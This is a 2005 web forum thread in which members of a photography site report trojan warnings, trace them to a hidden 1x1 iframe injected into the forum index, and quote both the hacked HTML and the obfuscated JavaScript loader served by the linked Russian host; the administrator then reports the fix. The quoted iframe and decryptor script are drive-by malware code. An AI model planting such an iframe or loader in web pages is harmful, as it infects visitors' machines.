Pages: [1]   Go Down

Author Topic: Trojan Horse Warning  (Read 5674 times)

Jack Flesher

  • Sr. Member
  • ****
  • Offline Offline
  • Posts: 2592
    • www.getdpi.com
Trojan Horse Warning
« on: November 20, 2005, 01:03:39 PM »

FWIW -- My virus detector signals a trojan horse virus every time I log into the user forums...
Logged

schaubild

  • Full Member
  • ***
  • Offline Offline
  • Posts: 141
Trojan Horse Warning
« Reply #1 on: November 20, 2005, 01:11:02 PM »

Same with me. The site tries to run a file named load.exe...  
Logged

francois

  • Sr. Member
  • ****
  • Offline Offline
  • Posts: 7793
Trojan Horse Warning
« Reply #2 on: November 20, 2005, 01:18:59 PM »

With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.
« Last Edit: November 20, 2005, 01:23:12 PM by francois »
Logged
Francois

Peter McLennan

  • Sr. Member
  • ****
  • Offline Offline
  • Posts: 1849
Trojan Horse Warning
« Reply #3 on: November 20, 2005, 01:45:20 PM »

Quote
With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.
[a href=\"index.php?act=findpost&pid=51780\"][{POST_SNAPBACK}][/a]


This morning I'm getting a blocked popup warning when I go to "view new posts".  Never seen that here before.

Peter
Logged

Concorde-SST

  • Full Member
  • ***
  • Offline Offline
  • Posts: 102
Trojan Horse Warning
« Reply #4 on: November 20, 2005, 01:48:11 PM »

Hello -

Im from Europe and I never had such problems
with this website.

Im using mac with safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.
Logged

Gary Brown

  • Full Member
  • ***
  • Offline Offline
  • Posts: 211
Trojan Horse Warning
« Reply #5 on: November 20, 2005, 01:49:57 PM »

In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.
Logged

Ben Rubinstein

  • Sr. Member
  • ****
  • Offline Offline
  • Posts: 1735
Trojan Horse Warning
« Reply #6 on: November 20, 2005, 01:59:47 PM »

Yup, I've been getting that, I've had my virus program block it but it still opens an empty window and tries to load the link Gary mentioned.

francois

  • Sr. Member
  • ****
  • Offline Offline
  • Posts: 7793
Trojan Horse Warning
« Reply #7 on: November 20, 2005, 02:01:43 PM »

Quote
Hello -

Im from Europe and I never had such problems
with this website.

Im using mac with safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.
[a href=\"index.php?act=findpost&pid=51784\"][{POST_SNAPBACK}][/a]

I'm also in Europe and using a Mac with Safari. As soon as the forum page loads, Safari closes the window. I tried to clear the caches & cookies and it helped somewhat but now it does it again.
     
Logged
Francois

francois

  • Sr. Member
  • ****
  • Offline Offline
  • Posts: 7793
Trojan Horse Warning
« Reply #8 on: November 20, 2005, 02:03:53 PM »

Quote
In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.
[a href=\"index.php?act=findpost&pid=51785\"][{POST_SNAPBACK}][/a]


If I load the offending url, Safari (on the Mac) closes the window immediately. Using curl shows the hacked  source leading to the Russian address.

"Hacked" LL forum source:
<td class="row2"><b><a href="http://luminous-landscape.com/forum/index.php?amp;showforum=1">Landscape &amp; Nature Photography</a></b><br /><span class="forumdesc">Nature Photography ? technical and esthetic issues<iframe src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"<br /><br /><i></i></span></td>



"Russian" page source:
<script language=JavaScript>
function decrypt_p(x)
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,58,7,61,18,40,43,41,34,6,0,0,0,0,0,0,25,22,31,49,36,26,16,5,47,50,57,
45,14,33,15,8,12,2,20,27,53,30,42,9,0,1,29,0,0,0,0,48,0,54,60,59,28,10,35,55,62,3
9,3,21,52,4,38,24,13,17,23,37,51,19,44,11,32,46,56);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write}}decrypt_p("Gn7CXHdlXB3n@Ubnb6PlGIU3GIvTGUdIeSvtX2PMm4oneUbn@V5CXHdlXB3n@EKCrtdTqroImHv
_Fuv_XfJtmNpCASbTPrZlGE3T9f7xWtbCeEdIeSp_whvTQy@neEKCrtdTqHW")
</script>
« Last Edit: November 20, 2005, 02:12:39 PM by francois »
Logged
Francois

mguertin

  • Guest
Trojan Horse Warning
« Reply #9 on: November 20, 2005, 02:33:27 PM »

Thanks guys.

This has been fixed.  Someone found a way to trigger an unwanted password reset.

So no more trojan and I'm looking into how the password reset was triggered so they can't use this method to gain access any longer.

Mark

P.S. Thanks for the extra info in this thread, made it much easier to track down as I'm also on Safari on a Mac
Logged
Pages: [1]   Go Up